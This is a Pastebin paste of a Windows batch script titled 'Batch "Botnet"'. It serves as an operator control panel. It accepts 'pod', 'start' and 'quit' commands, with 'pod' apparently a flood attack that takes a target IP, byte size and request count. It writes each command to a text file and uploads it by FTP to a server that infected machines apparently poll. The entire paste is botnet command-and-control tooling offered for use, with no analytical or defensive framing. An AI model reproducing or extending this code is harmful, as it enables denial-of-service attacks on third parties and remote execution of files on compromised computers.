Advertisement
Guest User

Batch Panel by qxvxtc

a guest
Aug 21st, 2019
151
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Batch 5.87 KB | None | 0 0
  1. @echo off
  2. title Batch "Botnet"
  3. color 0c
  4.  
  5. cd %userprofile%\AppData\Roaming
  6. if not exist qxv md qxv
  7. cd qxv
  8.  
  9. set ftp_server_ip=ftp server ip
  10. set ftp_server_username=ftp server username
  11. set ftp_server_password=ftp server password
  12. set ftp_server_channel=Channel name
  13.  
  14. :clear
  15. cls
  16. echo.██████╗  █████╗ ████████╗ ██████╗██╗  ██╗
  17. echo.██╔══██╗██╔══██╗╚══██╔══╝██╔════╝██║  ██║
  18. echo.██████╔╝███████║   ██║   ██║     ███████║
  19. echo.██╔══██╗██╔══██║   ██║   ██║     ██╔══██║
  20. echo.██████╔╝██║  ██║   ██║   ╚██████╗██║  ██║
  21. echo.╚═════╝ ╚═╝  ╚═╝   ╚═╝    ╚═════╝╚═╝  ╚═╝
  22. echo.
  23. :enter_command
  24. set /p enter_command=%ftp_server_username%@%ftp_server_ip%:
  25. if %enter_command%==pod goto pod
  26. if %enter_command%==quit goto quit
  27. if %enter_command%==start goto start
  28. if %enter_command%==clear goto clear
  29. goto enter_command
  30.  
  31. :pod
  32.  
  33. set /p ip=%ftp_server_username%@%ftp_server_ip% IP:
  34. set /p bytes=%ftp_server_username%@%ftp_server_ip% BYTES:
  35. set /p requests=%ftp_server_username%@%ftp_server_ip% REQUESTS:
  36. (
  37. echo %ip%
  38. echo %bytes%
  39. echo %requests%
  40. ) > pod.txt
  41.  
  42. (
  43. echo open %ftp_server_ip%
  44. echo %ftp_server_username%
  45. echo %ftp_server_password%
  46. echo cd /htdocs
  47. echo del pod.txt
  48. echo y
  49. echo bye
  50. ) > ftp_script.txt
  51. ftp -s:ftp_script.txt > ftp_scriptt.txt
  52. del ftp_script.txt
  53. del ftp_scriptt.txt
  54.  
  55. (
  56. echo open %ftp_server_ip%
  57. echo %ftp_server_username%
  58. echo %ftp_server_password%
  59. echo cd /htdocs
  60. echo put pod.txt
  61. echo y
  62. echo bye
  63. ) > ftp_script.txt
  64. ftp -s:ftp_script.txt > ftp_scriptt.txt
  65. del ftp_script.txt
  66. del ftp_scriptt.txt
  67.  
  68. del pod.txt
  69.  
  70. echo pod > command.txt
  71.  
  72. (
  73. echo open %ftp_server_ip%
  74. echo %ftp_server_username%
  75. echo %ftp_server_password%
  76. echo cd /htdocs
  77. echo del command.txt
  78. echo y
  79. echo bye
  80. ) > ftp_script.txt
  81. ftp -s:ftp_script.txt > ftp_scriptt.txt
  82. del ftp_script.txt
  83. del ftp_scriptt.txt
  84.  
  85. (
  86. echo open %ftp_server_ip%
  87. echo %ftp_server_username%
  88. echo %ftp_server_password%
  89. echo cd /htdocs
  90. echo put command.txt
  91. echo y
  92. echo bye
  93. ) > ftp_script.txt
  94. ftp -s:ftp_script.txt > ftp_scriptt.txt
  95. del ftp_script.txt
  96. del ftp_scriptt.txt
  97.  
  98. del command.txt
  99.  
  100. timeout 6 > 0
  101. del 0
  102.  
  103. echo none_command > command.txt
  104.  
  105. (
  106. echo open %ftp_server_ip%
  107. echo %ftp_server_username%
  108. echo %ftp_server_password%
  109. echo cd /htdocs
  110. echo del command.txt
  111. echo y
  112. echo bye
  113. ) > ftp_script.txt
  114. ftp -s:ftp_script.txt > ftp_scriptt.txt
  115. del ftp_script.txt
  116. del ftp_scriptt.txt
  117.  
  118. (
  119. echo open %ftp_server_ip%
  120. echo %ftp_server_username%
  121. echo %ftp_server_password%
  122. echo cd /htdocs
  123. echo put #%ftp_server_channel%.txt
  124. echo y
  125. echo bye
  126. ) > ftp_script.txt
  127. ftp -s:ftp_script.txt > ftp_scriptt.txt
  128. del ftp_script.txt
  129. del ftp_scriptt.txt
  130.  
  131. del command.txt
  132. goto enter_command
  133.  
  134. :quit
  135. echo quit > command.txt
  136.  
  137. (
  138. echo open %ftp_server_ip%
  139. echo %ftp_server_username%
  140. echo %ftp_server_password%
  141. echo cd /htdocs
  142. echo del command.txt
  143. echo y
  144. echo bye
  145. ) > ftp_script.txt
  146. ftp -s:ftp_script.txt > ftp_scriptt.txt
  147. del ftp_script.txt
  148. del ftp_scriptt.txt
  149.  
  150. (
  151. echo open %ftp_server_ip%
  152. echo %ftp_server_username%
  153. echo %ftp_server_password%
  154. echo cd /htdocs
  155. echo put command.txt
  156. echo y
  157. echo bye
  158. ) > ftp_script.txt
  159. ftp -s:ftp_script.txt > ftp_scriptt.txt
  160. del ftp_script.txt
  161. del ftp_scriptt.txt
  162.  
  163. del command.txt
  164.  
  165. timeout 6 > 0
  166. del 0
  167.  
  168. echo none_command > command.txt
  169.  
  170. (
  171. echo open %ftp_server_ip%
  172. echo %ftp_server_username%
  173. echo %ftp_server_password%
  174. echo cd /htdocs
  175. echo del command.txt
  176. echo y
  177. echo bye
  178. ) > ftp_script.txt
  179. ftp -s:ftp_script.txt > ftp_scriptt.txt
  180. del ftp_script.txt
  181. del ftp_scriptt.txt
  182.  
  183. (
  184. echo open %ftp_server_ip%
  185. echo %ftp_server_username%
  186. echo %ftp_server_password%
  187. echo cd /htdocs
  188. echo put command.txt
  189. echo y
  190. echo bye
  191. ) > ftp_script.txt
  192. ftp -s:ftp_script.txt > ftp_scriptt.txt
  193. del ftp_script.txt
  194. del ftp_scriptt.txt
  195.  
  196. del command.txt
  197. goto enter_command
  198.  
  199. :start
  200.  
  201. set /p start_file=%ftp_server_username%@%ftp_server_ip% START FILE:
  202.  
  203. echo %start_file% > start.txt
  204.  
  205. (
  206. echo open %ftp_server_ip%
  207. echo %ftp_server_username%
  208. echo %ftp_server_password%
  209. echo cd /htdocs
  210. echo del start.txt
  211. echo y
  212. echo bye
  213. ) > ftp_script.txt
  214. ftp -s:ftp_script.txt > ftp_scriptt.txt
  215. del ftp_script.txt
  216. del ftp_scriptt.txt
  217.  
  218. (
  219. echo open %ftp_server_ip%
  220. echo %ftp_server_username%
  221. echo %ftp_server_password%
  222. echo cd /htdocs
  223. echo put start.txt
  224. echo y
  225. echo bye
  226. ) > ftp_script.txt
  227. ftp -s:ftp_script.txt > ftp_scriptt.txt
  228. del ftp_script.txt
  229. del ftp_scriptt.txt
  230.  
  231. del start.txt
  232.  
  233. echo start > command.txt
  234.  
  235. (
  236. echo open %ftp_server_ip%
  237. echo %ftp_server_username%
  238. echo %ftp_server_password%
  239. echo cd /htdocs
  240. echo del command.txt
  241. echo y
  242. echo bye
  243. ) > ftp_script.txt
  244. ftp -s:ftp_script.txt > ftp_scriptt.txt
  245. del ftp_script.txt
  246. del ftp_scriptt.txt
  247.  
  248. (
  249. echo open %ftp_server_ip%
  250. echo %ftp_server_username%
  251. echo %ftp_server_password%
  252. echo cd /htdocs
  253. echo put command.txt
  254. echo y
  255. echo bye
  256. ) > ftp_script.txt
  257. ftp -s:ftp_script.txt > ftp_scriptt.txt
  258. del ftp_script.txt
  259. del ftp_scriptt.txt
  260.  
  261. del command.txt
  262.  
  263. timeout 6 > 0
  264. del 0
  265.  
  266. echo none_command > command.txt
  267.  
  268. (
  269. echo open %ftp_server_ip%
  270. echo %ftp_server_username%
  271. echo %ftp_server_password%
  272. echo cd /htdocs
  273. echo del command.txt
  274. echo y
  275. echo bye
  276. ) > ftp_script.txt
  277. ftp -s:ftp_script.txt > ftp_scriptt.txt
  278. del ftp_script.txt
  279. del ftp_scriptt.txt
  280.  
  281. (
  282. echo open %ftp_server_ip%
  283. echo %ftp_server_username%
  284. echo %ftp_server_password%
  285. echo cd /htdocs
  286. echo put #%ftp_server_channel%.txt
  287. echo y
  288. echo bye
  289. ) > ftp_script.txt
  290. ftp -s:ftp_script.txt > ftp_scriptt.txt
  291. del ftp_script.txt
  292. del ftp_scriptt.txt
  293.  
  294. del command.txt
  295. goto enter_command
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement